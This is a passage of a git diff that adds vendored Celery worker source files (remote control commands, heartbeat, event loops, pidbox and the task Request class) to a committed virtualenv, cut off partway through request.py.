isinstance(key, str) and not key.startswith('__') + + +# -- Task + +@inspect_command( + variadic='ids', + signature='[id1 [id2 [... [idN]]]]', +) +def query_task(state, ids, **kwargs): + """Query for task information by id.""" + return { + req.id: (_state_of_task(req), req.info()) + for req in _find_requests_by_id(maybe_list(ids)) + } + + +def _find_requests_by_id(ids, + get_request=worker_state.requests.__getitem__): + for task_id in ids: + try: + yield get_request(task_id) + except KeyError: + pass + + +def _state_of_task(request, + is_active=worker_state.active_requests.__contains__, + is_reserved=worker_state.reserved_requests.__contains__): + if is_active(request): + return 'active' + elif is_reserved(request): + return 'reserved' + return 'ready' + + +@control_command( + variadic='task_id', + signature='[id1 [id2 [... [idN]]]]', +) +def revoke(state, task_id, terminate=False, signal=None, **kwargs): + """Revoke task by task id (or list of ids). + + Keyword Arguments: + terminate (bool): Also terminate the process if the task is active. + signal (str): Name of signal to use for terminate (e.g., ``KILL``). + """ + # pylint: disable=redefined-outer-name + # XXX Note that this redefines `terminate`: + # Outside of this scope that is a function. + # supports list argument since 3.1 + task_ids, task_id = set(maybe_list(task_id) or []), None + task_ids = _revoke(state, task_ids, terminate, signal, **kwargs) + if isinstance(task_ids, dict) and 'ok' in task_ids: + return task_ids + return ok(f'tasks {task_ids} flagged as revoked') + + +@control_command( + variadic='headers', + signature='[key1=value1 [key2=value2 [... [keyN=valueN]]]]', +) +def revoke_by_stamped_headers(state, headers, terminate=False, signal=None, **kwargs): + """Revoke task by header (or list of headers). + + Keyword Arguments: + headers(dictionary): Dictionary that contains stamping scheme name as keys and stamps as values. + If headers is a list, it will be converted to a dictionary. + terminate (bool): Also terminate the process if the task is active. + signal (str): Name of signal to use for terminate (e.g., ``KILL``). 
+ Sample headers input: + {'mtask_id': [id1, id2, id3]} + """ + # pylint: disable=redefined-outer-name + # XXX Note that this redefines `terminate`: + # Outside of this scope that is a function. + # supports list argument since 3.1 + signum = _signals.signum(signal or TERM_SIGNAME) + + if isinstance(headers, list): + headers = {h.split('=')[0]: h.split('=')[1] for h in headers} + + for header, stamps in headers.items(): + updated_stamps = maybe_list(worker_state.revoked_stamps.get(header) or []) + list(maybe_list(stamps)) + worker_state.revoked_stamps[header] = updated_stamps + + if not terminate: + return ok(f'headers {headers} flagged as revoked, but not terminated') + + active_requests = list(worker_state.active_requests) + + terminated_scheme_to_stamps_mapping = defaultdict(set) + + # Terminate all running tasks of matching headers + # Go through all active requests, and check if one of the + # requests has a stamped header that matches the given headers to revoke + + for req in active_requests: + # Check stamps exist + if hasattr(req, "stamps") and req.stamps: + # if so, check if any stamps match a revoked stamp + for expected_header_key, expected_header_value in headers.items(): + if expected_header_key in req.stamps: + expected_header_value = maybe_list(expected_header_value) + actual_header = maybe_list(req.stamps[expected_header_key]) + matching_stamps_for_request = set(actual_header) & set(expected_header_value) + # Check any possible match regardless if the stamps are a sequence or not + if matching_stamps_for_request: + terminated_scheme_to_stamps_mapping[expected_header_key].update(matching_stamps_for_request) + req.terminate(state.consumer.pool, signal=signum) + + if not terminated_scheme_to_stamps_mapping: + return ok(f'headers {headers} were not terminated') + return ok(f'headers {terminated_scheme_to_stamps_mapping} revoked') + + +def _revoke(state, task_ids, terminate=False, signal=None, **kwargs): + size = len(task_ids) + terminated = set() + + worker_state.revoked.update(task_ids) + if terminate: + signum = _signals.signum(signal or TERM_SIGNAME) + for request in _find_requests_by_id(task_ids): + if request.id not in terminated: + terminated.add(request.id) + logger.info('Terminating %s (%s)', request.id, signum) + request.terminate(state.consumer.pool, signal=signum) + if len(terminated) >= size: + break + + if not terminated: + return ok('terminate: tasks unknown') + return ok('terminate: {}'.format(', '.join(terminated))) + + idstr = ', '.join(task_ids) + logger.info('Tasks flagged as revoked: %s', idstr) + return task_ids + + +@control_command( + variadic='task_id', + args=[('signal', str)], + signature=' [id1 [id2 [... [idN]]]]' +) +def terminate(state, signal, task_id, **kwargs): + """Terminate task by task id (or list of ids).""" + return revoke(state, task_id, terminate=True, signal=signal) + + +@control_command( + args=[('task_name', str), ('rate_limit', str)], + signature=' ', +) +def rate_limit(state, task_name, rate_limit, **kwargs): + """Tell worker(s) to modify the rate limit for a task by type. + + See Also: + :attr:`celery.app.task.Task.rate_limit`. + + Arguments: + task_name (str): Type of task to set rate limit for. + rate_limit (int, str): New rate limit. + """ + # pylint: disable=redefined-outer-name + # XXX Note that this redefines `terminate`: + # Outside of this scope that is a function. 
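+ # Illustrative client-side usage (the task name is a placeholder, not part + # of this module): this handler is normally reached through the control + # API, e.g. app.control.rate_limit('proj.tasks.add', '10/m'). Rate strings + # such as '10/s', '10/m' or '10/h' are validated by rate() just below.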
+ try: + rate(rate_limit) + except ValueError as exc: + return nok(f'Invalid rate limit string: {exc!r}') + + try: + state.app.tasks[task_name].rate_limit = rate_limit + except KeyError: + logger.error('Rate limit attempt for unknown task %s', + task_name, exc_info=True) + return nok('unknown task') + + state.consumer.reset_rate_limits() + + if not rate_limit: + logger.info('Rate limits disabled for tasks of type %s', task_name) + return ok('rate limit disabled successfully') + + logger.info('New rate limit for tasks of type %s: %s.', + task_name, rate_limit) + return ok('new rate limit set successfully') + + +@control_command( + args=[('task_name', str), ('soft', float), ('hard', float)], + signature=' [hard_secs]', +) +def time_limit(state, task_name=None, hard=None, soft=None, **kwargs): + """Tell worker(s) to modify the time limit for task by type. + + Arguments: + task_name (str): Name of task to change. + hard (float): Hard time limit. + soft (float): Soft time limit. + """ + try: + task = state.app.tasks[task_name] + except KeyError: + logger.error('Change time limit attempt for unknown task %s', + task_name, exc_info=True) + return nok('unknown task') + + task.soft_time_limit = soft + task.time_limit = hard + + logger.info('New time limits for tasks of type %s: soft=%s hard=%s', + task_name, soft, hard) + return ok('time limits set successfully') + + +# -- Events + + +@inspect_command() +def clock(state, **kwargs): + """Get current logical clock value.""" + return {'clock': state.app.clock.value} + + +@control_command() +def election(state, id, topic, action=None, **kwargs): + """Hold election. + + Arguments: + id (str): Unique election id. + topic (str): Election topic. + action (str): Action to take for elected actor. + """ + if state.consumer.gossip: + state.consumer.gossip.election(id, topic, action) + + +@control_command() +def enable_events(state): + """Tell worker(s) to send task-related events.""" + dispatcher = state.consumer.event_dispatcher + if dispatcher.groups and 'task' not in dispatcher.groups: + dispatcher.groups.add('task') + logger.info('Events of group {task} enabled by remote.') + return ok('task events enabled') + return ok('task events already enabled') + + +@control_command() +def disable_events(state): + """Tell worker(s) to stop sending task-related events.""" + dispatcher = state.consumer.event_dispatcher + if 'task' in dispatcher.groups: + dispatcher.groups.discard('task') + logger.info('Events of group {task} disabled by remote.') + return ok('task events disabled') + return ok('task events already disabled') + + +@control_command() +def heartbeat(state): + """Tell worker(s) to send event heartbeat immediately.""" + logger.debug('Heartbeat requested by remote.') + dispatcher = state.consumer.event_dispatcher + dispatcher.send('worker-heartbeat', freq=5, **worker_state.SOFTWARE_INFO) + + +# -- Worker + +@inspect_command(visible=False) +def hello(state, from_node, revoked=None, **kwargs): + """Request mingle sync-data.""" + # pylint: disable=redefined-outer-name + # XXX Note that this redefines `revoked`: + # Outside of this scope that is a function. + if from_node != state.hostname: + logger.info('sync with %s', from_node) + if revoked: + worker_state.revoked.update(revoked) + # Do not send expired items to the other worker. 
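+ # (purge() on the next line drops those expired entries.) For reference, + # the reply built below has the shape Mingle.sync_with_node() expects from + # each neighbor: {'revoked': <set of task ids>, 'clock': <logical clock>}.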
+ worker_state.revoked.purge() + return { + 'revoked': worker_state.revoked._data, + 'clock': state.app.clock.forward(), + } + + +@inspect_command(default_timeout=0.2) +def ping(state, **kwargs): + """Ping worker(s).""" + return ok('pong') + + +@inspect_command() +def stats(state, **kwargs): + """Request worker statistics/information.""" + return state.consumer.controller.stats() + + +@inspect_command(alias='dump_schedule') +def scheduled(state, **kwargs): + """List of currently scheduled ETA/countdown tasks.""" + return list(_iter_schedule_requests(state.consumer.timer)) + + +def _iter_schedule_requests(timer): + for waiting in timer.schedule.queue: + try: + arg0 = waiting.entry.args[0] + except (IndexError, TypeError): + continue + else: + if isinstance(arg0, Request): + yield { + 'eta': arg0.eta.isoformat() if arg0.eta else None, + 'priority': waiting.priority, + 'request': arg0.info(), + } + + +@inspect_command(alias='dump_reserved') +def reserved(state, **kwargs): + """List of currently reserved tasks, not including scheduled/active.""" + reserved_tasks = ( + state.tset(worker_state.reserved_requests) - + state.tset(worker_state.active_requests) + ) + if not reserved_tasks: + return [] + return [request.info() for request in reserved_tasks] + + +@inspect_command(alias='dump_active') +def active(state, safe=False, **kwargs): + """List of tasks currently being executed.""" + return [request.info(safe=safe) + for request in state.tset(worker_state.active_requests)] + + +@inspect_command(alias='dump_revoked') +def revoked(state, **kwargs): + """List of revoked task-ids.""" + return list(worker_state.revoked) + + +@inspect_command( + alias='dump_tasks', + variadic='taskinfoitems', + signature='[attr1 [attr2 [... [attrN]]]]', +) +def registered(state, taskinfoitems=None, builtins=False, **kwargs): + """List of registered tasks. + + Arguments: + taskinfoitems (Sequence[str]): List of task attributes to include. + Defaults to ``exchange,routing_key,rate_limit``. + builtins (bool): Also include built-in tasks. + """ + reg = state.app.tasks + taskinfoitems = taskinfoitems or DEFAULT_TASK_INFO_ITEMS + + tasks = reg if builtins else ( + task for task in reg if not task.startswith('celery.')) + + def _extract_info(task): + fields = { + field: str(getattr(task, field, None)) for field in taskinfoitems + if getattr(task, field, None) is not None + } + if fields: + info = ['='.join(f) for f in fields.items()] + return '{} [{}]'.format(task.name, ' '.join(info)) + return task.name + + return [_extract_info(reg[task]) for task in sorted(tasks)] + + +# -- Debugging + +@inspect_command( + default_timeout=60.0, + args=[('type', str), ('num', int), ('max_depth', int)], + signature='[object_type=Request] [num=200 [max_depth=10]]', +) +def objgraph(state, num=200, max_depth=10, type='Request'): # pragma: no cover + """Create graph of uncollected objects (memory-leak debugging). + + Arguments: + num (int): Max number of objects to graph. + max_depth (int): Traverse at most n levels deep. + type (str): Name of object to graph. Default is ``"Request"``. 
+ """ + try: + import objgraph as _objgraph + except ImportError: + raise ImportError('Requires the objgraph library') + logger.info('Dumping graph for type %r', type) + with tempfile.NamedTemporaryFile(prefix='cobjg', + suffix='.png', delete=False) as fh: + objects = _objgraph.by_type(type)[:num] + _objgraph.show_backrefs( + objects, + max_depth=max_depth, highlight=lambda v: v in objects, + filename=fh.name, + ) + return {'filename': fh.name} + + +@inspect_command() +def memsample(state, **kwargs): + """Sample current RSS memory usage.""" + from celery.utils.debug import sample_mem + return sample_mem() + + +@inspect_command( + args=[('samples', int)], + signature='[n_samples=10]', +) +def memdump(state, samples=10, **kwargs): # pragma: no cover + """Dump statistics of previous memsample requests.""" + from celery.utils import debug + out = io.StringIO() + debug.memdump(file=out) + return out.getvalue() + +# -- Pool + + +@control_command( + args=[('n', int)], + signature='[N=1]', +) +def pool_grow(state, n=1, **kwargs): + """Grow pool by n processes/threads.""" + if state.consumer.controller.autoscaler: + return nok("pool_grow is not supported with autoscale. Adjust autoscale range instead.") + else: + state.consumer.pool.grow(n) + state.consumer._update_prefetch_count(n) + return ok('pool will grow') + + +@control_command( + args=[('n', int)], + signature='[N=1]', +) +def pool_shrink(state, n=1, **kwargs): + """Shrink pool by n processes/threads.""" + if state.consumer.controller.autoscaler: + return nok("pool_shrink is not supported with autoscale. Adjust autoscale range instead.") + else: + state.consumer.pool.shrink(n) + state.consumer._update_prefetch_count(-n) + return ok('pool will shrink') + + +@control_command() +def pool_restart(state, modules=None, reload=False, reloader=None, **kwargs): + """Restart execution pool.""" + if state.app.conf.worker_pool_restarts: + state.consumer.controller.reload(modules, reload, reloader=reloader) + return ok('reload started') + else: + raise ValueError('Pool restarts not enabled') + + +@control_command( + args=[('max', int), ('min', int)], + signature='[max [min]]', +) +def autoscale(state, max=None, min=None): + """Modify autoscale settings.""" + autoscaler = state.consumer.controller.autoscaler + if autoscaler: + max_, min_ = autoscaler.update(max, min) + return ok(f'autoscale now max={max_} min={min_}') + raise ValueError('Autoscale not enabled') + + +@control_command() +def shutdown(state, msg='Got shutdown from remote', **kwargs): + """Shutdown worker(s).""" + logger.warning(msg) + raise WorkerShutdown(msg) + + +# -- Queues + +@control_command( + args=[ + ('queue', str), + ('exchange', str), + ('exchange_type', str), + ('routing_key', str), + ], + signature=' [exchange [type [routing_key]]]', +) +def add_consumer(state, queue, exchange=None, exchange_type=None, + routing_key=None, **options): + """Tell worker(s) to consume from task queue by name.""" + state.consumer.call_soon( + state.consumer.add_task_queue, + queue, exchange, exchange_type or 'direct', routing_key, **options) + return ok(f'add consumer {queue}') + + +@control_command( + args=[('queue', str)], + signature='', +) +def cancel_consumer(state, queue, **_): + """Tell worker(s) to stop consuming from task queue by name.""" + state.consumer.call_soon( + state.consumer.cancel_task_queue, queue, + ) + return ok(f'no longer consuming from {queue}') + + +@inspect_command() +def active_queues(state): + """List the task queues a worker is currently consuming from.""" + if 
state.consumer.task_consumer: + return [dict(queue.as_dict(recurse=True)) + for queue in state.consumer.task_consumer.queues] + return [] diff --git a/env/Lib/site-packages/celery/worker/heartbeat.py b/env/Lib/site-packages/celery/worker/heartbeat.py new file mode 100644 index 00000000..efdcc3b4 --- /dev/null +++ b/env/Lib/site-packages/celery/worker/heartbeat.py @@ -0,0 +1,61 @@ +"""Heartbeat service. + +This is the internal thread responsible for sending heartbeat events +at regular intervals (may not be an actual thread). +""" +from celery.signals import heartbeat_sent +from celery.utils.sysinfo import load_average + +from .state import SOFTWARE_INFO, active_requests, all_total_count + +__all__ = ('Heart',) + + +class Heart: + """Timer sending heartbeats at regular intervals. + + Arguments: + timer (kombu.asynchronous.timer.Timer): Timer to use. + eventer (celery.events.EventDispatcher): Event dispatcher + to use. + interval (float): Time in seconds between sending + heartbeats. Default is 2 seconds. + """ + + def __init__(self, timer, eventer, interval=None): + self.timer = timer + self.eventer = eventer + self.interval = float(interval or 2.0) + self.tref = None + + # Make event dispatcher start/stop us when enabled/disabled. + self.eventer.on_enabled.add(self.start) + self.eventer.on_disabled.add(self.stop) + + # Only send heartbeat_sent signal if it has receivers. + self._send_sent_signal = ( + heartbeat_sent.send if heartbeat_sent.receivers else None) + + def _send(self, event, retry=True): + if self._send_sent_signal is not None: + self._send_sent_signal(sender=self) + return self.eventer.send(event, freq=self.interval, + active=len(active_requests), + processed=all_total_count[0], + loadavg=load_average(), + retry=retry, + **SOFTWARE_INFO) + + def start(self): + if self.eventer.enabled: + self._send('worker-online') + self.tref = self.timer.call_repeatedly( + self.interval, self._send, ('worker-heartbeat',), + ) + + def stop(self): + if self.tref is not None: + self.timer.cancel(self.tref) + self.tref = None + if self.eventer.enabled: + self._send('worker-offline', retry=False) diff --git a/env/Lib/site-packages/celery/worker/loops.py b/env/Lib/site-packages/celery/worker/loops.py new file mode 100644 index 00000000..0630e679 --- /dev/null +++ b/env/Lib/site-packages/celery/worker/loops.py @@ -0,0 +1,135 @@ +"""The consumers highly-optimized inner loop.""" +import errno +import socket + +from celery import bootsteps +from celery.exceptions import WorkerLostError +from celery.utils.log import get_logger + +from . import state + +__all__ = ('asynloop', 'synloop') + +# pylint: disable=redefined-outer-name +# We cache globals and attribute lookups, so disable this warning. 
+ +logger = get_logger(__name__) + + +def _quick_drain(connection, timeout=0.1): + try: + connection.drain_events(timeout=timeout) + except Exception as exc: # pylint: disable=broad-except + exc_errno = getattr(exc, 'errno', None) + if exc_errno is not None and exc_errno != errno.EAGAIN: + raise + + +def _enable_amqheartbeats(timer, connection, rate=2.0): + heartbeat_error = [None] + + if not connection: + return heartbeat_error + + heartbeat = connection.get_heartbeat_interval() # negotiated + if not (heartbeat and connection.supports_heartbeats): + return heartbeat_error + + def tick(rate): + try: + connection.heartbeat_check(rate) + except Exception as e: + # heartbeat_error is passed by reference can be updated + # no append here list should be fixed size=1 + heartbeat_error[0] = e + + timer.call_repeatedly(heartbeat / rate, tick, (rate,)) + return heartbeat_error + + +def asynloop(obj, connection, consumer, blueprint, hub, qos, + heartbeat, clock, hbrate=2.0): + """Non-blocking event loop.""" + RUN = bootsteps.RUN + update_qos = qos.update + errors = connection.connection_errors + + on_task_received = obj.create_task_handler() + + heartbeat_error = _enable_amqheartbeats(hub.timer, connection, rate=hbrate) + + consumer.on_message = on_task_received + obj.controller.register_with_event_loop(hub) + obj.register_with_event_loop(hub) + consumer.consume() + obj.on_ready() + + # did_start_ok will verify that pool processes were able to start, + # but this will only work the first time we start, as + # maxtasksperchild will mess up metrics. + if not obj.restart_count and not obj.pool.did_start_ok(): + raise WorkerLostError('Could not start worker processes') + + # consumer.consume() may have prefetched up to our + # limit - drain an event so we're in a clean state + # prior to starting our event loop. + if connection.transport.driver_type == 'amqp': + hub.call_soon(_quick_drain, connection) + + # FIXME: Use loop.run_forever + # Tried and works, but no time to test properly before release. + hub.propagate_errors = errors + loop = hub.create_loop() + + try: + while blueprint.state == RUN and obj.connection: + state.maybe_shutdown() + if heartbeat_error[0] is not None: + raise heartbeat_error[0] + + # We only update QoS when there's no more messages to read. + # This groups together qos calls, and makes sure that remote + # control commands will be prioritized over task messages. 
+ if qos.prev != qos.value: + update_qos() + + try: + next(loop) + except StopIteration: + loop = hub.create_loop() + finally: + try: + hub.reset() + except Exception as exc: # pylint: disable=broad-except + logger.exception( + 'Error cleaning up after event loop: %r', exc) + + +def synloop(obj, connection, consumer, blueprint, hub, qos, + heartbeat, clock, hbrate=2.0, **kwargs): + """Fallback blocking event loop for transports that doesn't support AIO.""" + RUN = bootsteps.RUN + on_task_received = obj.create_task_handler() + perform_pending_operations = obj.perform_pending_operations + heartbeat_error = [None] + if getattr(obj.pool, 'is_green', False): + heartbeat_error = _enable_amqheartbeats(obj.timer, connection, rate=hbrate) + consumer.on_message = on_task_received + consumer.consume() + + obj.on_ready() + + while blueprint.state == RUN and obj.connection: + state.maybe_shutdown() + if heartbeat_error[0] is not None: + raise heartbeat_error[0] + if qos.prev != qos.value: + qos.update() + try: + perform_pending_operations() + connection.drain_events(timeout=2.0) + except socket.timeout: + pass + except OSError: + if blueprint.state == RUN: + raise diff --git a/env/Lib/site-packages/celery/worker/pidbox.py b/env/Lib/site-packages/celery/worker/pidbox.py new file mode 100644 index 00000000..a18b4338 --- /dev/null +++ b/env/Lib/site-packages/celery/worker/pidbox.py @@ -0,0 +1,122 @@ +"""Worker Pidbox (remote control).""" +import socket +import threading + +from kombu.common import ignore_errors +from kombu.utils.encoding import safe_str + +from celery.utils.collections import AttributeDict +from celery.utils.functional import pass1 +from celery.utils.log import get_logger + +from . import control + +__all__ = ('Pidbox', 'gPidbox') + +logger = get_logger(__name__) +debug, error, info = logger.debug, logger.error, logger.info + + +class Pidbox: + """Worker mailbox.""" + + consumer = None + + def __init__(self, c): + self.c = c + self.hostname = c.hostname + self.node = c.app.control.mailbox.Node( + safe_str(c.hostname), + handlers=control.Panel.data, + state=AttributeDict( + app=c.app, + hostname=c.hostname, + consumer=c, + tset=pass1 if c.controller.use_eventloop else set), + ) + self._forward_clock = self.c.app.clock.forward + + def on_message(self, body, message): + # just increase clock as clients usually don't + # have a valid clock to adjust with. 
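+ # (forward() only advances the local logical clock; full adjust()-based + # clock syncing between workers is done by the Mingle bootstep at startup.)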
+ self._forward_clock() + try: + self.node.handle_message(body, message) + except KeyError as exc: + error('No such control command: %s', exc) + except Exception as exc: + error('Control command error: %r', exc, exc_info=True) + self.reset() + + def start(self, c): + self.node.channel = c.connection.channel() + self.consumer = self.node.listen(callback=self.on_message) + self.consumer.on_decode_error = c.on_decode_error + + def on_stop(self): + pass + + def stop(self, c): + self.on_stop() + self.consumer = self._close_channel(c) + + def reset(self): + self.stop(self.c) + self.start(self.c) + + def _close_channel(self, c): + if self.node and self.node.channel: + ignore_errors(c, self.node.channel.close) + + def shutdown(self, c): + self.on_stop() + if self.consumer: + debug('Canceling broadcast consumer...') + ignore_errors(c, self.consumer.cancel) + self.stop(self.c) + + +class gPidbox(Pidbox): + """Worker pidbox (greenlet).""" + + _node_shutdown = None + _node_stopped = None + _resets = 0 + + def start(self, c): + c.pool.spawn_n(self.loop, c) + + def on_stop(self): + if self._node_stopped: + self._node_shutdown.set() + debug('Waiting for broadcast thread to shutdown...') + self._node_stopped.wait() + self._node_stopped = self._node_shutdown = None + + def reset(self): + self._resets += 1 + + def _do_reset(self, c, connection): + self._close_channel(c) + self.node.channel = connection.channel() + self.consumer = self.node.listen(callback=self.on_message) + self.consumer.consume() + + def loop(self, c): + resets = [self._resets] + shutdown = self._node_shutdown = threading.Event() + stopped = self._node_stopped = threading.Event() + try: + with c.connection_for_read() as connection: + info('pidbox: Connected to %s.', connection.as_uri()) + self._do_reset(c, connection) + while not shutdown.is_set() and c.connection: + if resets[0] < self._resets: + resets[0] += 1 + self._do_reset(c, connection) + try: + connection.drain_events(timeout=1.0) + except socket.timeout: + pass + finally: + stopped.set() diff --git a/env/Lib/site-packages/celery/worker/request.py b/env/Lib/site-packages/celery/worker/request.py new file mode 100644 index 00000000..5d7c93a4 --- /dev/null +++ b/env/Lib/site-packages/celery/worker/request.py @@ -0,0 +1,790 @@ +"""Task request. + +This module defines the :class:`Request` class, that specifies +how tasks are executed. +""" +import logging +import sys +from datetime import datetime +from time import monotonic, time +from weakref import ref + +from billiard.common import TERM_SIGNAME +from billiard.einfo import ExceptionWithTraceback +from kombu.utils.encoding import safe_repr, safe_str +from kombu.utils.objects import cached_property + +from celery import current_app, signals +from celery.app.task import Context +from celery.app.trace import fast_trace_task, trace_task, trace_task_ret +from celery.concurrency.base import BasePool +from celery.exceptions import (Ignore, InvalidTaskError, Reject, Retry, TaskRevokedError, Terminated, + TimeLimitExceeded, WorkerLostError) +from celery.platforms import signals as _signals +from celery.utils.functional import maybe, maybe_list, noop +from celery.utils.log import get_logger +from celery.utils.nodenames import gethostname +from celery.utils.serialization import get_pickled_exception +from celery.utils.time import maybe_iso8601, maybe_make_aware, timezone + +from . import state + +__all__ = ('Request',) + +# pylint: disable=redefined-outer-name +# We cache globals and attribute lookups, so disable this warning. 
+ +IS_PYPY = hasattr(sys, 'pypy_version_info') + +logger = get_logger(__name__) +debug, info, warn, error = (logger.debug, logger.info, + logger.warning, logger.error) +_does_info = False +_does_debug = False + + +def __optimize__(): + # this is also called by celery.app.trace.setup_worker_optimizations + global _does_debug + global _does_info + _does_debug = logger.isEnabledFor(logging.DEBUG) + _does_info = logger.isEnabledFor(logging.INFO) + + +__optimize__() + +# Localize +tz_or_local = timezone.tz_or_local +send_revoked = signals.task_revoked.send +send_retry = signals.task_retry.send + +task_accepted = state.task_accepted +task_ready = state.task_ready +revoked_tasks = state.revoked +revoked_stamps = state.revoked_stamps + + +class Request: + """A request for task execution.""" + + acknowledged = False + time_start = None + worker_pid = None + time_limits = (None, None) + _already_revoked = False + _already_cancelled = False + _terminate_on_ack = None + _apply_result = None + _tzlocal = None + + if not IS_PYPY: # pragma: no cover + __slots__ = ( + '_app', '_type', 'name', 'id', '_root_id', '_parent_id', + '_on_ack', '_body', '_hostname', '_eventer', '_connection_errors', + '_task', '_eta', '_expires', '_request_dict', '_on_reject', '_utc', + '_content_type', '_content_encoding', '_argsrepr', '_kwargsrepr', + '_args', '_kwargs', '_decoded', '__payload', + '__weakref__', '__dict__', + ) + + def __init__(self, message, on_ack=noop, + hostname=None, eventer=None, app=None, + connection_errors=None, request_dict=None, + task=None, on_reject=noop, body=None, + headers=None, decoded=False, utc=True, + maybe_make_aware=maybe_make_aware, + maybe_iso8601=maybe_iso8601, **opts): + self._message = message + self._request_dict = (message.headers.copy() if headers is None + else headers.copy()) + self._body = message.body if body is None else body + self._app = app + self._utc = utc + self._decoded = decoded + if decoded: + self._content_type = self._content_encoding = None + else: + self._content_type, self._content_encoding = ( + message.content_type, message.content_encoding, + ) + self.__payload = self._body if self._decoded else message.payload + self.id = self._request_dict['id'] + self._type = self.name = self._request_dict['task'] + if 'shadow' in self._request_dict: + self.name = self._request_dict['shadow'] or self.name + self._root_id = self._request_dict.get('root_id') + self._parent_id = self._request_dict.get('parent_id') + timelimit = self._request_dict.get('timelimit', None) + if timelimit: + self.time_limits = timelimit + self._argsrepr = self._request_dict.get('argsrepr', '') + self._kwargsrepr = self._request_dict.get('kwargsrepr', '') + self._on_ack = on_ack + self._on_reject = on_reject + self._hostname = hostname or gethostname() + self._eventer = eventer + self._connection_errors = connection_errors or () + self._task = task or self._app.tasks[self._type] + self._ignore_result = self._request_dict.get('ignore_result', False) + + # timezone means the message is timezone-aware, and the only timezone + # supported at this point is UTC. 
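+ # Illustrative values for the headers handled below: 'eta' and 'expires' + # arrive as ISO 8601 strings such as '2009-11-17T12:30:56.527191+00:00', + # parsed with maybe_iso8601() and made timezone-aware via maybe_make_aware().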
+ eta = self._request_dict.get('eta') + if eta is not None: + try: + eta = maybe_iso8601(eta) + except (AttributeError, ValueError, TypeError) as exc: + raise InvalidTaskError( + f'invalid ETA value {eta!r}: {exc}') + self._eta = maybe_make_aware(eta, self.tzlocal) + else: + self._eta = None + + expires = self._request_dict.get('expires') + if expires is not None: + try: + expires = maybe_iso8601(expires) + except (AttributeError, ValueError, TypeError) as exc: + raise InvalidTaskError( + f'invalid expires value {expires!r}: {exc}') + self._expires = maybe_make_aware(expires, self.tzlocal) + else: + self._expires = None + + delivery_info = message.delivery_info or {} + properties = message.properties or {} + self._delivery_info = { + 'exchange': delivery_info.get('exchange'), + 'routing_key': delivery_info.get('routing_key'), + 'priority': properties.get('priority'), + 'redelivered': delivery_info.get('redelivered', False), + } + self._request_dict.update({ + 'properties': properties, + 'reply_to': properties.get('reply_to'), + 'correlation_id': properties.get('correlation_id'), + 'hostname': self._hostname, + 'delivery_info': self._delivery_info + }) + # this is a reference pass to avoid memory usage burst + self._request_dict['args'], self._request_dict['kwargs'], _ = self.__payload + self._args = self._request_dict['args'] + self._kwargs = self._request_dict['kwargs'] + + @property + def delivery_info(self): + return self._delivery_info + + @property + def message(self): + return self._message + + @property + def request_dict(self): + return self._request_dict + + @property + def body(self): + return self._body + + @property + def app(self): + return self._app + + @property + def utc(self): + return self._utc + + @property + def content_type(self): + return self._content_type + + @property + def content_encoding(self): + return self._content_encoding + + @property + def type(self): + return self._type + + @property + def root_id(self): + return self._root_id + + @property + def parent_id(self): + return self._parent_id + + @property + def argsrepr(self): + return self._argsrepr + + @property + def args(self): + return self._args + + @property + def kwargs(self): + return self._kwargs + + @property + def kwargsrepr(self): + return self._kwargsrepr + + @property + def on_ack(self): + return self._on_ack + + @property + def on_reject(self): + return self._on_reject + + @on_reject.setter + def on_reject(self, value): + self._on_reject = value + + @property + def hostname(self): + return self._hostname + + @property + def ignore_result(self): + return self._ignore_result + + @property + def eventer(self): + return self._eventer + + @eventer.setter + def eventer(self, eventer): + self._eventer = eventer + + @property + def connection_errors(self): + return self._connection_errors + + @property + def task(self): + return self._task + + @property + def eta(self): + return self._eta + + @property + def expires(self): + return self._expires + + @expires.setter + def expires(self, value): + self._expires = value + + @property + def tzlocal(self): + if self._tzlocal is None: + self._tzlocal = self._app.conf.timezone + return self._tzlocal + + @property + def store_errors(self): + return (not self.task.ignore_result or + self.task.store_errors_even_if_ignored) + + @property + def task_id(self): + # XXX compat + return self.id + + @task_id.setter + def task_id(self, value): + self.id = value + + @property + def task_name(self): + # XXX compat + return self.name + + @task_name.setter + def 
task_name(self, value): + self.name = value + + @property + def reply_to(self): + # used by rpc backend when failures reported by parent process + return self._request_dict['reply_to'] + + @property + def replaced_task_nesting(self): + return self._request_dict.get('replaced_task_nesting', 0) + + @property + def groups(self): + return self._request_dict.get('groups', []) + + @property + def stamped_headers(self) -> list: + return self._request_dict.get('stamped_headers') or [] + + @property + def stamps(self) -> dict: + stamps = self._request_dict.get('stamps') or {} + return {header: stamps.get(header) for header in self.stamped_headers} + + @property + def correlation_id(self): + # used similarly to reply_to + return self._request_dict['correlation_id'] + + def execute_using_pool(self, pool: BasePool, **kwargs): + """Used by the worker to send this task to the pool. + + Arguments: + pool (~celery.concurrency.base.TaskPool): The execution pool + used to execute this request. + + Raises: + celery.exceptions.TaskRevokedError: if the task was revoked. + """ + task_id = self.id + task = self._task + if self.revoked(): + raise TaskRevokedError(task_id) + + time_limit, soft_time_limit = self.time_limits + trace = fast_trace_task if self._app.use_fast_trace_task else trace_task_ret + result = pool.apply_async( + trace, + args=(self._type, task_id, self._request_dict, self._body, + self._content_type, self._content_encoding), + accept_callback=self.on_accepted, + timeout_callback=self.on_timeout, + callback=self.on_success, + error_callback=self.on_failure, + soft_timeout=soft_time_limit or task.soft_time_limit, + timeout=time_limit or task.time_limit, + correlation_id=task_id, + ) + # cannot create weakref to None + self._apply_result = maybe(ref, result) + return result + + def execute(self, loglevel=None, logfile=None): + """Execute the task in a :func:`~celery.app.trace.trace_task`. + + Arguments: + loglevel (int): The loglevel used by the task. + logfile (str): The logfile used by the task. + """ + if self.revoked(): + return + + # acknowledge task as being processed. + if not self.task.acks_late: + self.acknowledge() + + _, _, embed = self._payload + request = self._request_dict + # pylint: disable=unpacking-non-sequence + # payload is a property, so pylint doesn't think it's a tuple. 
